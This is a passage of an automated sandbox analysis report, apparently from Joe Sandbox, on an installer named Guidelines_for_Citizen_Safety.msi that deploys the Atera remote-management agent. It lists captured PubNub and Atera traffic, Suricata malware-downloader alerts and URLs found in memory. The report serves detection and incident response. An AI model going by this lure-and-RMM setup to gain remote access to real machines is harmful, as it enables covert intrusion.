                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=3a79d35f-3aae-426f-91c8-7d16143c1d7a&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=ebb1f16f-c11d-4880-8816-8b8ea69a0ee1&tr=31&tt=17324434182234301&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=f3cbab58-b709-46f1-9320-2a47ceb98572&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=7cbe7b17-7f3f-4c8d-9d62-c19102ed6fde&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=e037a3ed-5082-482a-83de-1fb0a079a164&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=5c21410a-40ef-453f-8c5e-f80e3c3a9e9b&tr=31&tt=17324434351531129&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=03f53b61-ad6b-486d-8509-b0e195faf765&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=21b072dc-59f8-4574-823e-a233b13880ce&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=326c90ae-c5b0-4a74-aa79-71ed3289b5e6&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=1be45d8e-3b2c-4ea5-a5b7-07647d59b850&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=50d6fee0-b13e-4824-8baa-cb59cf186680&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=a0a85a46-f9d7-4b43-9103-c66ecd6f79b0&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49779 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49900 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49952 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49931 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49971 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49980 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49793 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50066 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50083 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50034 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50009 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50053 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50078 -> 13.232.67.198:443
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global traffic | DNS traffic detected: DNS query: time.windows.com
                              Source: global traffic | DNS traffic detected: DNS query: agent-api.atera.com
                              Source: global traffic | DNS traffic detected: DNS query: ps.pndsn.com
                              Source: global traffic | DNS traffic detected: DNS query: ps.atera.com
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03B3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B0340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/l
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/t
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED1F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EEC90000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03DE000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.2.dr, AgentPackageAgentInformation.exe.15.dr, Atera.AgentPackage.Common.dll.15.dr, Newtonsoft.Json.dll.15.dr, 6c6861.msi.2.dr, AteraAgent.exe.2.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000002.1778616808.000002AC6900B000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000017.00000002.2230821396.000002C46BDF2000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000017.00000002.2230821396.000002C46BD96000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2393836236.0000020EDC907000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2393367410.0000020EDC8A6000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, C56C4404C4DEF0DC88E5FCD9F09CB2F1.15.dr, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, AgentPackageAgentInformation.exe.15.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, AgentPackageAgentInformation.exe.15.dr, Newtonsoft.Json.dll.5.dr, Atera.AgentPackage.Common.dll.15.dr, Newtonsoft.Json.dll.15.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0K
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0N
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Newtonsoft.Json.dll.5.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, Newtonsoft.Json.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0O
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EEC90000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, AgentPackageAgentInformation.exe.15.dr, Newtonsoft.Json.dll.5.dr, Atera.AgentPackage.Common.dll.15.dr, Newtonsoft.Json.dll.15.dr, 6c6861.msi.2.dr, Newtonsoft.Json.dll.18.dr, AteraAgent.exe.2.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRS
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED43000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2637180822.0000018896EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF
                              Source: AteraAgent.exe, 0000000D.00000002.1533766772.00000158EC97D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2643291786.00000188AFFC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7Nfjgt
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:800
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80G
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80ystemprofile
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertAssuredIDRootCA.crl%-
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FD3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897F00000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FE5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ps.pndsn.com
                              Source: AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
                              Source: AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                              Source: AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceProcess
                              Source: rundll32.exe, 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000002.1777274260.000002AC50783000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000017.00000002.2229922038.000002C4536AF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2391164954.0000020EC410F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://wixtoolset.org
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.18.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.18.drString found in binary or memory: http://wixtoolset.org/news/
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.18.drString found in binary or memory: http://wixtoolset.org/releases/
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED1F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EEC90000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03DE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, AgentPackageAgentInformation.exe.15.dr, Newtonsoft.Json.dll.5.dr, Atera.AgentPackage.Common.dll.15.dr, Newtonsoft.Json.dll.15.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                              Source: AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.oh
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FAA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.P
                              Source: rundll32.exe, 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.aterD
                              Source: rundll32.exe, 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.aterDZ
                              Source: AgentPackageAgentInformation.exe, 00000019.00000002.2391164954.0000020EC410F000.00000004.00000800.00020000.00000000.sdmp, AlphaControlAgentInstallation.dll.5.dr, AlphaControlAgentInstallation.dll.6.dr, AlphaControlAgentInstallation.dll.18.dr, AlphaControlAgentInstallation.dll.4.drString found in binary or memory: https://agent-api.atera.com
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmp, AlphaControlAgentInstallation.dll.5.dr, AlphaControlAgentInstallation.dll.6.dr, AlphaControlAgentInstallation.dll.18.dr, AlphaControlAgentInstallation.dll.4.drString found in binary or memory: https://agent-api.atera.com/
                              Source: AgentPackageAgentInformation.exe, 00000013.00000002.1777274260.000002AC50783000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000017.00000002.2229922038.000002C4536AF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2391164954.0000020EC410F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmp, AlphaControlAgentInstallation.dll.5.dr, AlphaControlAgentInstallation.dll.6.dr, AlphaControlAgentInstallation.dll.18.dr, AlphaControlAgentInstallation.dll.4.drString found in binary or memory: https://agent-api.atera.com/Production/Agent/
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AcknowledgeCommands
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AcknowledgeCommands0H
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/Age
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FAA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188979FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897B41000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AgentStarting
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AgentStarting)
